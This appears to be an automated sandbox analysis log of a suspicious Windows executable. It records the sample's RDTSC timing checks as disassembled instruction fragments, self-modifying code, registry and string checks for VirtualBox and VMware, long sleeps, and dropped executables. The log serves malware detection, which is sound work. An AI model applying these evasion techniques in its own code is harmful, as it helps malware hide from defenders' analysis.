Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D707E0 second address: 4D70855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 pushfd 0x00000006 jmp 00007F270C81A213h 0x0000000b add ah, FFFFFFAEh 0x0000000e jmp 00007F270C81A219h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esi+2Ch], eax 0x0000001a jmp 00007F270C81A20Eh 0x0000001f mov ax, word ptr [ebx+6Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F270C81A20Dh 0x0000002c add ah, FFFFFF96h 0x0000002f jmp 00007F270C81A211h 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70855 second address: 4D7086C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F270C8198D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7086C second address: 4D70895 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+30h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70895 second address: 4D70899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70899 second address: 4D7089D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7089D second address: 4D708A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D708A3 second address: 4D708DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A212h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 jmp 00007F270C81A210h 0x00000015 mov word ptr [esi+32h], ax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e mov esi, edx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D708DC second address: 4D7093D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F270C8198D1h 0x00000009 xor si, 46C6h 0x0000000e jmp 00007F270C8198D1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [ebx+0000008Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov dx, 354Eh 0x00000024 pushfd 0x00000025 jmp 00007F270C8198CFh 0x0000002a jmp 00007F270C8198D3h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7093D second address: 4D70967 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ebx, 4359E00Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70967 second address: 4D7096C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7096C second address: 4D70973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70973 second address: 4D709BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+18h] 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushfd 0x0000000d jmp 00007F270C8198CFh 0x00000012 or ax, 7D6Eh 0x00000017 jmp 00007F270C8198D9h 0x0000001c popfd 0x0000001d pop eax 0x0000001e mov edi, 4A309964h 0x00000023 popad 0x00000024 mov dword ptr [esi+38h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D709BE second address: 4D709C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D709C2 second address: 4D709C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D709C8 second address: 4D70A05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A217h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c pushad 0x0000000d push eax 0x0000000e mov ecx, edi 0x00000010 pop edx 0x00000011 call 00007F270C81A20Ch 0x00000016 movzx eax, dx 0x00000019 pop ebx 0x0000001a popad 0x0000001b mov dword ptr [esi+3Ch], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70A05 second address: 4D70A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70A09 second address: 4D70A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A20Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70A18 second address: 4D70A7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 204Ah 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+20h] 0x0000000f jmp 00007F270C8198D7h 0x00000014 mov dword ptr [esi+40h], eax 0x00000017 pushad 0x00000018 movzx esi, di 0x0000001b mov bx, BAE4h 0x0000001f popad 0x00000020 lea eax, dword ptr [ebx+00000080h] 0x00000026 jmp 00007F270C8198D3h 0x0000002b push 00000001h 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F270C8198D5h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70A7C second address: 4D70A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70A97 second address: 4D70AD1 instructions: 0x00000000 rdtsc 0x00000002 mov ah, 29h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F270C8198D5h 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F270C8198D6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70AD1 second address: 4D70AE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A20Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70AE0 second address: 4D70AE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70AE5 second address: 4D70B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, B3E8h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov eax, ebx 0x0000000f pushad 0x00000010 movsx ebx, ax 0x00000013 popad 0x00000014 popad 0x00000015 lea eax, dword ptr [ebp-10h] 0x00000018 jmp 00007F270C81A20Dh 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ebx, 0E7E83DEh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70B15 second address: 4D70B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70B1A second address: 4D70B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov si, 6253h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70B2E second address: 4D70B40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70B84 second address: 4D70B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70B88 second address: 4D70B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70B8C second address: 4D70B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70B92 second address: 4D70C03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F270C8198D2h 0x00000009 or eax, 4C056FC8h 0x0000000f jmp 00007F270C8198CBh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F270C8198D8h 0x0000001b jmp 00007F270C8198D5h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 test edi, edi 0x00000026 pushad 0x00000027 mov ecx, 5C0075B3h 0x0000002c mov ch, BAh 0x0000002e popad 0x0000002f js 00007F277C8A8392h 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70C03 second address: 4D70CBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A20Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c jmp 00007F270C81A216h 0x00000011 mov dword ptr [esi+04h], eax 0x00000014 jmp 00007F270C81A210h 0x00000019 lea eax, dword ptr [ebx+78h] 0x0000001c jmp 00007F270C81A210h 0x00000021 push 00000001h 0x00000023 pushad 0x00000024 pushad 0x00000025 mov si, C153h 0x00000029 pushfd 0x0000002a jmp 00007F270C81A218h 0x0000002f adc esi, 41BCFED8h 0x00000035 jmp 00007F270C81A20Bh 0x0000003a popfd 0x0000003b popad 0x0000003c movzx esi, bx 0x0000003f popad 0x00000040 push eax 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007F270C81A20Eh 0x00000048 and ecx, 5B20C938h 0x0000004e jmp 00007F270C81A20Bh 0x00000053 popfd 0x00000054 push esi 0x00000055 pop ecx 0x00000056 popad 0x00000057 mov dword ptr [esp], eax 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d mov di, si 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70CBD second address: 4D70D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c jmp 00007F270C8198D0h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F270C8198D9h 0x0000001b add si, B296h 0x00000020 jmp 00007F270C8198D1h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70D5C second address: 4D70D62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70D62 second address: 4D70D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70D66 second address: 4D70D81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A20Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70D81 second address: 4D70D94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70D94 second address: 4D70DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop eax 0x00000010 mov edx, 1A27DCAAh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70DBE second address: 4D70E02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F277C8A81ADh 0x0000000f pushad 0x00000010 jmp 00007F270C8198CEh 0x00000015 mov edi, esi 0x00000017 popad 0x00000018 mov eax, dword ptr [ebp-04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F270C8198D3h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70E02 second address: 4D70E53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 436Ah 0x00000007 mov si, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+08h], eax 0x00000010 pushad 0x00000011 call 00007F270C81A213h 0x00000016 movzx esi, dx 0x00000019 pop edi 0x0000001a mov ah, 64h 0x0000001c popad 0x0000001d lea eax, dword ptr [ebx+70h] 0x00000020 pushad 0x00000021 push ebx 0x00000022 mov bx, cx 0x00000025 pop eax 0x00000026 popad 0x00000027 push 00000001h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F270C81A216h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70E53 second address: 4D70E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70E57 second address: 4D70E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70E5D second address: 4D70ED1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F270C8198CCh 0x00000008 pop eax 0x00000009 mov dx, 3056h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebp 0x00000011 jmp 00007F270C8198CAh 0x00000016 mov dword ptr [esp], eax 0x00000019 pushad 0x0000001a push esi 0x0000001b movsx edx, si 0x0000001e pop ecx 0x0000001f mov cx, dx 0x00000022 popad 0x00000023 lea eax, dword ptr [ebp-18h] 0x00000026 pushad 0x00000027 mov edi, 7BA21342h 0x0000002c jmp 00007F270C8198D3h 0x00000031 popad 0x00000032 nop 0x00000033 jmp 00007F270C8198D6h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F270C8198CEh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70ED1 second address: 4D70EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F270C81A20Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70EE3 second address: 4D70EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70F3D second address: 4D70F41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70F41 second address: 4D70F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70F47 second address: 4D70F9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A20Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F277C8A895Eh 0x0000000f jmp 00007F270C81A210h 0x00000014 mov eax, dword ptr [ebp-14h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F270C81A20Dh 0x00000020 and esi, 27119CA6h 0x00000026 jmp 00007F270C81A211h 0x0000002b popfd 0x0000002c push esi 0x0000002d pop edi 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70F9C second address: 4D70FB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F270C8198D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D70FB8 second address: 4D71085 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a pushad 0x0000000b jmp 00007F270C81A20Dh 0x00000010 jmp 00007F270C81A210h 0x00000015 popad 0x00000016 mov dword ptr [esi+0Ch], eax 0x00000019 jmp 00007F270C81A210h 0x0000001e mov edx, 74E806ECh 0x00000023 jmp 00007F270C81A210h 0x00000028 sub eax, eax 0x0000002a jmp 00007F270C81A211h 0x0000002f lock cmpxchg dword ptr [edx], ecx 0x00000033 jmp 00007F270C81A20Eh 0x00000038 pop edi 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F270C81A20Eh 0x00000040 add ecx, 013ABBC8h 0x00000046 jmp 00007F270C81A20Bh 0x0000004b popfd 0x0000004c jmp 00007F270C81A218h 0x00000051 popad 0x00000052 test eax, eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F270C81A217h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D71085 second address: 4D7108A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D7108A second address: 4D71090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D71090 second address: 4D710AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jne 00007F277C8A7F0Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F270C8198CCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D710AB second address: 4D710B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D710B1 second address: 4D710B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 4D710B5 second address: 4D71166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+08h] 0x0000000b jmp 00007F270C81A219h 0x00000010 mov eax, dword ptr [esi] 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F270C81A20Ch 0x00000019 add si, E548h 0x0000001e jmp 00007F270C81A20Bh 0x00000023 popfd 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F270C81A216h 0x0000002b sbb ax, A7A8h 0x00000030 jmp 00007F270C81A20Bh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F270C81A218h 0x0000003c or cl, 00000008h 0x0000003f jmp 00007F270C81A20Bh 0x00000044 popfd 0x00000045 popad 0x00000046 popad 0x00000047 mov dword ptr [edx], eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F270C81A215h 0x00000050 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Special instruction interceptor: First address: 81C9FE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Special instruction interceptor: First address: 9CB09D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Special instruction interceptor: First address: 9F5E82 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion			Jump to behavior

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe

Code function: 0_2_00AB7486 rdtsc

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Window / User API: threadDelayed 1307			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Window / User API: threadDelayed 1250			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Window / User API: threadDelayed 1304			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Window / User API: threadDelayed 1250			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Window / User API: threadDelayed 1467			Jump to behavior

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]			Jump to dropped file
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RW3K9d2N3G7523VWAEKe2F3YfY1G\Bunifu_UI_v1.5.3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RW3K9d2N3G7523VWAEKe2F3YfY1G\Y-Cleaner.exe			Jump to dropped file
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]			Jump to dropped file

Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 6596	Thread sleep count: 49 > 30			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 6596	Thread sleep time: -98049s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 3332	Thread sleep count: 61 > 30			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 4312	Thread sleep count: 1307 > 30			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 4312	Thread sleep time: -2615307s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 3332	Thread sleep count: 62 > 30			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 3332	Thread sleep count: 133 > 30			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 3332	Thread sleep count: 91 > 30			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 3332	Thread sleep count: 85 > 30			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 3332	Thread sleep count: 212 > 30			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 3332	Thread sleep count: 37 > 30			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 5084	Thread sleep count: 85 > 30			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 5084	Thread sleep time: -170085s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 5284	Thread sleep count: 1250 > 30			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 5284	Thread sleep time: -2501250s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 4136	Thread sleep count: 1304 > 30			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 4136	Thread sleep time: -2609304s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 3688	Thread sleep count: 1250 > 30			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 3688	Thread sleep time: -2501250s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 3104	Thread sleep count: 1467 > 30			Jump to behavior
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe TID: 3104	Thread sleep time: -2935467s >= -30000s			Jump to behavior

Source: BEd2lJRXFM.exe, BEd2lJRXFM.exe, 00000000.00000002.2660197534.00000000009AC000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
